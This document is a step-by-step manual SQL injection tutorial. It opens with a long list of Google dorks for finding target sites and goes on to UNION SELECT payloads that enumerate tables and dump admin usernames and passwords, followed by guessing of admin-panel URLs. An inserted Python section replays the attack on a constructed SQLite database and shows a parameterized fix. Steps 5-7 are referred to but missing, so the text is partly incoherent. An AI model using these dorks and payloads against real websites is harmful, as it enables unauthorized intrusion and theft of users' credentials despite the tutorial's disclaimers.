NOTE: Hacking is an illegal activity, so don't try this on anyone. This tutorial is only for educational purposes. If you want to use this tutorial for malicious purposes, please stop reading.
Manual SQL Injection
Step 1: Finding vulnerable websites:
Find vulnerable websites using a Google dork list. A dork is a search query that matches URLs with a given pattern, here pages that take an id-style parameter.
Dorks, some examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
inurl:index.php?catid=
inurl:news.php?catid=
inurl:news.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:material.php?id=
inurl:viewapp.php?id=
inurl:galeri_info.php?l=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
Copy one of the above dorks and paste it into the Google search box. Hit enter. You will get a list of websites whose URLs match the pattern. Matching the pattern only means the page takes an id-style parameter; whether the site is actually vulnerable is what Step 2 checks.
Note: if you want to hack a particular website, then try this (no space after site:):
site:www.victimsite.com dork_list_commands
for eg:
site:www.victimsite.com inurl:index.php?id=
Step 2: Checking the vulnerability:
Now we should check whether the website is vulnerable. To do that, add a single quote (') at the end of the URL and hit enter (no space between the number and the single quote).
For eg:
http://www.victimsite.com/index.php?id=2'
https://www.site.com/index.php?id=1'
If the page stays the same, shows "page not found" or shows some other page, this quick check has found nothing (that does not prove the site is safe: injection that produces no visible error, so-called blind SQL injection, is not covered by this tutorial). If it shows an error related to the SQL query, then it is vulnerable.
For eg:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Here are some other ways to check a website's vulnerability. Each one breaks the query in a different way, depending on how the parameter is embedded in it (the closing bracket, for example, targets a query such as WHERE id=(1)).
Using a closing bracket )
https://www.site.com/index.php?id=1)
Using a single quote '
https://www.site.com/index.php?id=1'
Using a double quote "
https://www.site.com/index.php?id=1"
The next step is to count the total number of columns. First check which comment type works, so that we can balance our query: the database ignores everything after the comment, including whatever remains of the original query.
Here are some basic comments:
https://www.site.com/index.php?id=1--
https://www.site.com/index.php?id=1--+
https://www.site.com/index.php?id=1-- -
https://www.site.com/index.php?id=1--+-
https://www.site.com/index.php?id=1%23
https://www.site.com/index.php?id=1;
In MySQL the -- comment must be followed by whitespace, which is why the --+ form (the + is decoded as a space by the web server) and the -- - form are used; %23 is the URL encoding of #, which also starts a comment in MySQL. The ; only ends the statement and is not a comment.
After balancing our query, let's count the total number of columns. We can count columns using an ORDER BY or GROUP BY statement.
Step 3: Finding the number of columns:
Now we have found that the website is vulnerable. The next step is to find the number of columns the query selects. For that, replace the single quote (') with an "order by n" statement (leave one space between the number and the order by statement).
Change n from 1, 2, 3, 4, 5, 6, ... n until you get an error like "Unknown column 'n' in 'order clause'".
For eg:
http://www.victimsite.com/index.php?id=2 order by 1
http://www.victimsite.com/index.php?id=2 order by 2
http://www.victimsite.com/index.php?id=2 order by 3
http://www.victimsite.com/index.php?id=2 order by 4
Change the number until you get the "unknown column" error. If you get the error while trying the "x"th number, then the number of columns is "x-1".
I mean:
http://www.victimsite.com/index.php?id=2 order by 1 (no error)
http://www.victimsite.com/index.php?id=2 order by 2 (no error)
http://www.victimsite.com/index.php?id=2 order by 3 (no error)
http://www.victimsite.com/index.php?id=2 order by 4 (no error)
http://www.victimsite.com/index.php?id=2 order by 5 (no error)
http://www.victimsite.com/index.php?id=2 order by 6 (no error)
http://www.victimsite.com/index.php?id=2 order by 7 (no error)
http://www.victimsite.com/index.php?id=2 order by 8 (error)
So now x=8, and the number of columns is x-1, i.e. 7. Sometimes the above may not work, usually because the original query continues after the point where our text is inserted. In that case add the comment "--" (or "--+", so that the space MySQL requires survives URL decoding) at the end of the statement.
For eg:
http://www.victimsite.com/index.php?id=2 order by 1--+
Step 4: Displaying the vulnerable columns:
Using "union select columns_sequence" we can find which columns of the query are displayed on the page. Replace the "order by n" with this statement, and change the id value to a negative number (i.e. id=-2). The negative id makes the original query return no row, so the page renders our injected row instead; it is usually necessary, but some websites may work without changing it. Replace columns_sequence with the numbers from 1 to x-1 (the number of columns), separated with commas (,).
For eg:
if the number of columns is 7, then the query is as follows:
http://www.victimsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
It will show some numbers on the page (each of them between 1 and x-1, the number of columns). Those are the columns whose value the page prints, so they are the ones we can replace with a function or subquery to read data out.
Now replace the "from information_schema.tables where table_schema=database()--" with "from information_schema.columns where table_name=mysqlchar--".
Now listen carefully: we have to convert the table name to a MySQL CHAR() string and replace mysqlchar with that.
Find the MySQL CHAR() string for the table name:
First of all install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now select SQL -> MySQL -> MySQL CHAR()
This will open a small window; enter the table name which you found. I am going to use the admin table name. Click OK.
Now you can see the CHAR(numbers separated with commas) in the HackBar toolbar.
Copy and paste the code at the end of the URL instead of the "mysqlchar". CHAR() is used so that the table name contains no quote characters, which the application may be escaping; the hex form 0x61646d696e works the same way in MySQL.
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
Now it will show the list of columns.
Like admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..
Now replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).
columnname and anothercolumnname should be replaced with names from the listed columns; 0x3a is the hex for ":", which separates the two values in the output. Then replace the "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name".
For eg:
http://www.victimsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
Sometimes it will say that the column is not found. Then try other column names. Now it will show the usernames and passwords. If the website has members, then it's a jackpot for you: you will have the list of usernames and passwords. Sometimes you may have the email ids also.
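Steps 2 through 7 above, run end to end against a constructed database, followed by the hardened form of the same page. This is an added example, not code from the original tutorial: the articles and admin tables, the page template that prints only title and body and echoes database errors, and the use of SQLite in place of MySQL (so the error messages differ, and sqlite_master and pragma_table_info() stand in for information_schema) are all assumptions made for the example.

```python
import re
import sqlite3

# Constructed sample database standing in for the tutorial's victimsite
# backend. The tutorial targets MySQL; SQLite is used here so the example
# runs offline, so the error texts differ and SQLite's sqlite_master and
# pragma_table_info() play the role of MySQL's information_schema.
SCHEMA = """
CREATE TABLE articles (id INTEGER, title TEXT, body TEXT, author TEXT);
INSERT INTO articles VALUES (1, 'First post', 'hello', 'alice');
INSERT INTO articles VALUES (2, 'Second post', 'world', 'bob');
CREATE TABLE admin (admin_id INTEGER, admin_name TEXT, admin_password TEXT);
INSERT INTO admin VALUES (1, 'root', 'S3cret!');
INSERT INTO admin VALUES (2, 'editor', 'hunter2');
"""

def open_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con

def vulnerable_page(con, raw_id):
    """index.php?id=<raw_id> as the tutorial assumes it: the parameter is
    pasted into the SQL text, only title and body are rendered (author is
    selected but never shown), and database errors are echoed to the visitor."""
    sql = f"SELECT title, body, author FROM articles WHERE id={raw_id}"
    try:
        rows = con.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return f"Database error: {exc}"
    if not rows:
        return "Not found"
    title, body, _author = rows[0]
    return f"<h1>{title}</h1><p>{body}</p>"

def has_sql_error(html):
    return html.startswith("Database error:")

def looks_injectable(con, id_value="2"):
    """Step 2: append a single quote; a database error in the response is
    the tutorial's indicator (no error does not prove the site is safe)."""
    return has_sql_error(vulnerable_page(con, f"{id_value}'"))

def count_columns(con, id_value="2", limit=20):
    """Step 3: ORDER BY n succeeds while n <= number of selected columns;
    the first n that errors means the query selects n-1 columns."""
    for n in range(1, limit + 1):
        if has_sql_error(vulnerable_page(con, f"{id_value} ORDER BY {n}")):
            return n - 1
    return None  # no error within the limit: this technique did not work

def displayed_columns(con, ncols):
    """Step 4: UNION SELECT 1..n with a negative id so only the injected row
    is rendered; the marker numbers visible in the HTML are the columns
    whose values the page prints."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    html = vulnerable_page(con, f"-2 UNION SELECT {markers}")
    return [int(m) for m in re.findall(r">(\d+)<", html)]

def read_via_union(con, subquery, ncols):
    """Steps 5-7: place a scalar subquery in displayed column 1 (found in
    Step 4), pad the remaining columns with numbers, and read the result
    back out of the <h1> where column 1 is rendered."""
    cols = [f"({subquery})"] + [str(i) for i in range(2, ncols + 1)]
    html = vulnerable_page(con, f"-2 UNION SELECT {','.join(cols)}")
    return re.search(r"<h1>(.*?)</h1>", html).group(1)

# SQLite equivalents of the tutorial's MySQL payloads:
#   group_concat(table_name) from information_schema.tables where table_schema=database()
#   group_concat(column_name) from information_schema.columns where table_name=CHAR(97,100,109,105,110)
#   group_concat(admin_name,0x3a,admin_password) from admin
TABLES_Q = "SELECT group_concat(name) FROM sqlite_master WHERE type='table'"
COLUMNS_Q = "SELECT group_concat(name) FROM pragma_table_info(char(97,100,109,105,110))"
CREDS_Q = "SELECT group_concat(admin_name || ':' || admin_password) FROM admin"

def safe_page(con, raw_id):
    """Hardened form: validate the id, then bind it as a parameter so it can
    never become SQL text. Every payload above is rejected before it reaches
    the database."""
    if not re.fullmatch(r"\d+", raw_id):
        return "Bad request"
    rows = con.execute(
        "SELECT title, body, author FROM articles WHERE id=?", (int(raw_id),)
    ).fetchall()
    if not rows:
        return "Not found"
    title, body, _author = rows[0]
    return f"<h1>{title}</h1><p>{body}</p>"

if __name__ == "__main__":
    db = open_db()
    print("injectable:", looks_injectable(db))
    n = count_columns(db)
    print("columns:", n, "displayed:", displayed_columns(db, n))
    for q in (TABLES_Q, COLUMNS_Q, CREDS_Q):
        print(read_via_union(db, q, n))
    print("hardened:", safe_page(db, "-2 UNION SELECT 1,2,3"))
```

Running the file prints the detection result, the column count (3, of which columns 1 and 2 are displayed), the table list, the admin table's columns and the name:password pairs, and then shows the parameterized version rejecting the same payload. Against a real MySQL target the payload shapes are the ones in the tutorial; only the metadata subqueries change.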
Step 8: Finding the admin panel:
Just try URLs like:
http://www.victimsite.com/admin.php
http://www.victimsite.com/admin/
http://www.victimsite.com/admin.html
http://www.victimsite.com:2082/
etc. (Port 2082 is the default cPanel port, i.e. the hosting control panel rather than the site's own admin page.)
Legal Disclaimer: This tutorial is completely for educational purposes only. The author will not be held responsible for any misuse of this tutorial by any means.
If you have any queries, please comment on my posts.